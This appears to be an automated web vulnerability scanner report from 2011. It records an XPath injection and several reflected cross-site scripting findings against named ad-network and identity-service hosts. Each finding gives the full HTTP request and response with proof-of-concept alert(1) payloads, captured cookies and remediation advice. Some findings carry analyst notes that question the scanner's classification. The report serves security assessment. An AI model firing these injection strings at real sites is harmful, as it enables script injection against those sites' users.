The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /js/prototype.js'?45cfd1b2f5 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:02 GMT
Server: Apache
Last-Modified: Fri, 17 Jul 2009 18:23:54 GMT
ETag: "1103eb-1e468-e4086280"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sun, 24 Apr 2011 03:21:02 GMT
Connection: Keep-Alive
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 124008

/* Prototype JavaScript framework, version 1.6.0.1
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototyp
...[SNIP]...
Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1,
MobileSafari: !!navigator.userAgent.match(/Apple.*Mobile.*Safari/)
},

BrowserFeatures: {
XPath: !!document.evaluate,
ElementExtensions: !!window.HTMLElement,
SpecificElementExtensions:
document.createElement('div').__proto__ &&
document.createElement('div').__proto__ !==

...[SNIP]...

5. Cross-site scripting (reflected)
There are 98 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [labels parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the labels request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f993c"-alert(1)-"20f0488e922 was submitted in the labels parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369f993c"-alert(1)-"20f0488e922&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:37:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7318

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3/f/192/%2a/k%3B240320597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369f993c"-alert(1)-"20f0488e922&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [redirecturl2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the redirecturl2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 499fc"-alert(1)-"cfc85e2b456 was submitted in the redirecturl2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=499fc"-alert(1)-"cfc85e2b456 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7222
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 12:39:39 GMT
Expires: Sun, 24 Apr 2011 12:39:39 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=499fc"-alert(1)-"cfc85e2b456http://www.metropcs.com/android?utm_source=DART&utm_medium=Display%2BMedia&utm_campaign=MPCS%2BGM%2BQ2%2BInterim%2B(5403001)");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbdata2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the rtbdata2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f76fe"-alert(1)-"0f47eb8b094 was submitted in the rtbdata2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQIf76fe"-alert(1)-"0f47eb8b094&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:39:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7318

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
gXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQIf76fe"-alert(1)-"0f47eb8b094&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29");
var fscUrl = url;
var fsc
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the rtbip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23c5b"-alert(1)-"62d3592bb19 was submitted in the rtbip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.14923c5b"-alert(1)-"62d3592bb19&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:38:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7318

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
20597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.14923c5b"-alert(1)-"62d3592bb19&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFl
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb328"-alert(1)-"9fe4dc0640 was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that in the request and response shown the canary is actually appended to the a= value inside the click= path parameter (…r?a=p-03tSqaTFVs1lseb328"…), not to sz=160x600; the parameter label reflects how the scanner split the URL, but the reflection point is the same inline string as in 5.1 to 5.4.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1lseb328"-alert(1)-"9fe4dc0640&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:37:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7314

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/f/191/%2a/k%3B240320597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1lseb328"-alert(1)-"9fe4dc0640&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEP
...[SNIP]...

5.6. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the application's response. The payload ad34f<script>alert(1)</script>7e0dd690cc was submitted in the uid parameter. This input was echoed unmodified in the application's response.

The scanner classifies the echo as plain text between tags, but the response is served as text/javascript and the value lands inside a double-quoted JavaScript string literal (the arguments to __ADXPOSE_WIDGET_IN_VIEW__). In that context the <script> markup is inert, so the reflection shown does not by itself demonstrate script execution. The relevant check for a resource loaded via <script src> is a canary that closes the literal, such as prefix"-alert(1)-"suffix, and the impact then depends on an including page passing an attacker-influenced uid; the report does not include that test, so exploitability here is unconfirmed.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668ad34f<script>alert(1)</script>7e0dd690cc HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3667F90C3D92533777E23512D2CC53A4; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:29:28 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_289668ad34f<script>alert(1)</script>7e0dd690cc".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_289668ad34f<script>
...[SNIP]...

5.7. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the application's response. The payload e96ed<script>alert(1)</script>bfcafa00f07 was submitted in the func parameter. This input was echoed unmodified in the application's response.

The response is served as application/x-javascript and consists of the func value followed by (""); the parameter is emitted unquoted as the callee of a function call, JSONP-style. The <script> markup in the canary therefore only produces a syntax error in the returned script. What the response does show is that any JavaScript expression supplied in func is executed verbatim by a page that includes this URL as a script, which is a stronger finding than the text-between-tags classification suggests; loaded directly in a browser the response is not rendered as HTML, so impact depends on how the including page (here the hotelclub.com ad frame named in the Referer) builds the func value. Restrict func to a whitelist of callback names, or at minimum to the pattern ^[A-Za-z_$][\w$.]*$.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractione96ed<script>alert(1)</script>bfcafa00f07&n=ar_int_p97174789&1303647004372 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303646989%2E757%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:02 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractione96ed<script>alert(1)</script>bfcafa00f07("");

5.8. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the application's response. The payload 98ed0<script>alert(1)</script>82d8bb5aab2 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

